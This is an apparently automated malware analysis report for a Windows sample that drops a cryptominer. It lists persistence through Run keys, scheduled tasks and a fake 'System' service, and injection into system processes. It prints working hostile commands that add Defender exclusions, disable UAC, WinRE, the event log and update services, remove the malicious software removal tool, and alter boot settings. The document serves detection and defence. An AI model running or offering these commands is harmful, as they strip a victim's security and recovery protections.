Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'jusched' = '%APPDATA%\jusched\jusched.exe'
- [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'jusched' = '"%APPDATA%\jusched\jusched.exe"'
Creates or modifies the following files
- %APPDATA%\microsoft\windows\start menu\programs\startup\jusched.lnk
- <SYSTEM32>\tasks\microsoft\windows\shell\updatedetection
- <SYSTEM32>\tasks\dialersvc64
Sets the following service settings
- [HKLM\SYSTEM\CurrentControlSet\Services\System] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\System] 'ImagePath' = '%ALLUSERSPROFILE%\System\System32.exe'
Creates the following services
- 'System' %ALLUSERSPROFILE%\System\System32.exe
Malicious functions
To complicate detection of its presence in the operating system,
blocks the following features:
- System Restore (SR)
- User Account Control (UAC)
- Windows Recovery Environment (WinRE)
- Windows Event Logging
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '%TEMP%\823e74549a4c\jusched.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'jusched.exe'
Executes the following
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="BlkDoT" dir=out action=block protocol=tcp remoteport=853 enable=yes
Injects code into
the following system processes:
- <SYSTEM32>\dllhost.exe
- <SYSTEM32>\searchprotocolhost.exe
- <SYSTEM32>\searchfilterhost.exe
- <SYSTEM32>\dialer.exe
Modifies file system
Creates the following files
- %LOCALAPPDATA%\microsoft\windows\05e8fe5b.exe
- %APPDATA%\jusched\jusched.exe
- %LOCALAPPDATA%\microsoft\windowsservices\svchost.dat
- %TEMP%\d26145181d3f\8b063e64.dll
- %TEMP%\fa8a610db7cd\470adc78.dll
- %LOCALAPPDATA%\microsoft\windows\actioncentercache\windows-systemtoast-securityandmaintenance_10_0.png
- %TEMP%\19eb17b099ee\5b29b9b3.dll
- %TEMP%\224efa4a238a\miner.exe
- %TEMP%\823e74549a4c\jusched.exe
- %ALLUSERSPROFILE%\system\system32.exe
- %WINDIR%\temp\__psscriptpolicytest_22imciai.0u2.ps1
- %WINDIR%\temp\__psscriptpolicytest_hxpgvc0o.gmx.psm1
Sets the 'hidden' attribute to the following files
- %LOCALAPPDATA%\microsoft\windowsservices\svchost.dat
Deletes following files that it created itself
- %TEMP%\d26145181d3f\8b063e64.dll
- %TEMP%\fa8a610db7cd\470adc78.dll
- %WINDIR%\temp\__psscriptpolicytest_22imciai.0u2.ps1
- %WINDIR%\temp\__psscriptpolicytest_hxpgvc0o.gmx.psm1
Moves the following system files
- from C:\recovery\windowsre\winre.wim to C:\recovery\windowsre\winre.bak
Modifies the HOSTS file.
Network activity
Connects to
- 'ip##pi.com':80
TCP
HTTP GET requests
- http://ip##pi.com/line/?fi############
Other
- '17#.#60.157.96':7878
UDP
- DNS ASK ip##pi.com
Miscellaneous
Creates and executes the following
- '%LOCALAPPDATA%\microsoft\windows\05e8fe5b.exe'
- '%TEMP%\224efa4a238a\miner.exe'
- '%TEMP%\823e74549a4c\jusched.exe'
- '%APPDATA%\jusched\jusched.exe'
- '%ALLUSERSPROFILE%\system\system32.exe'
Restarts the analyzed sample
Executes the following
- '<SYSTEM32>\schtasks.exe' /Query /TN "jusched"
- '<SYSTEM32>\schtasks.exe' /Create /TN "jusched" /TR "%APPDATA%\jusched\jusched.exe" /SC ONLOGON /RL HIGHEST /F
- '<SYSTEM32>\schtasks.exe' /Create /TN "jusched" /TR "%APPDATA%\jusched\jusched.exe" /SC ONLOGON /F
- '<SYSTEM32>\schtasks.exe' /Query /TN "\Microsoft\Windows\Shell\UpdateDetection"
- '<SYSTEM32>\schtasks.exe' /Delete /TN "\Microsoft\Windows\Shell\UpdateDetection" /F
- '<SYSTEM32>\schtasks.exe' /Create /TN "\Microsoft\Windows\Shell\UpdateDetection" /TR "%APPDATA%\jusched\jusched.exe" /SC ONSTART /RU SYSTEM /RL HIGHEST /F
- '<SYSTEM32>\dllhost.exe'
- '<SYSTEM32>\searchprotocolhost.exe'
- '<SYSTEM32>\rundll32.exe' "%TEMP%\d26145181d3f\8b063e64.dll",ExcludeMain
- '<SYSTEM32>\searchfilterhost.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -NoP -W Hidden -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0 -Type DWord -Force"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -W Hidden -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0 -Type DWord -Force"
- '<SYSTEM32>\reagentc.exe' /disable
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy IgnoreAllFailures
- '<SYSTEM32>\bcdedit.exe' /set {bootmgr} displaybootmenu No
- '<SYSTEM32>\bcdedit.exe' /timeout 0
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-dc 0
- '<SYSTEM32>\dialer.exe'
- '<SYSTEM32>\sc.exe' delete "System"
- '<SYSTEM32>\sc.exe' create "System" binpath= "%ALLUSERSPROFILE%\System\System32.exe" start= "auto"
- '<SYSTEM32>\sc.exe' stop eventlog
- '<SYSTEM32>\sc.exe' start "System"
- '<SYSTEM32>\cmd.exe' /c choice /C Y /N /D Y /T 3 & Del "%TEMP%\224efa4a238a\miner.exe"
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 3
- '<SYSTEM32>\schtasks.exe' /Query /TN "jusched"' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /Create /TN "jusched" /TR "%APPDATA%\jusched\jusched.exe" /SC ONLOGON /RL HIGHEST /F' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /Create /TN "jusched" /TR "%APPDATA%\jusched\jusched.exe" /SC ONLOGON /F' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /Query /TN "\Microsoft\Windows\Shell\UpdateDetection"' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /Delete /TN "\Microsoft\Windows\Shell\UpdateDetection" /F' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /Create /TN "\Microsoft\Windows\Shell\UpdateDetection" /TR "%APPDATA%\jusched\jusched.exe" /SC ONSTART /RU SYSTEM /RL HIGHEST /F' (with hidden window)
- '%TEMP%\224efa4a238a\miner.exe' ' (with hidden window)
- '%TEMP%\823e74549a4c\jusched.exe' ' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '%TEMP%\823e74549a4c\jusched.exe'' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'jusched.exe'' (with hidden window)
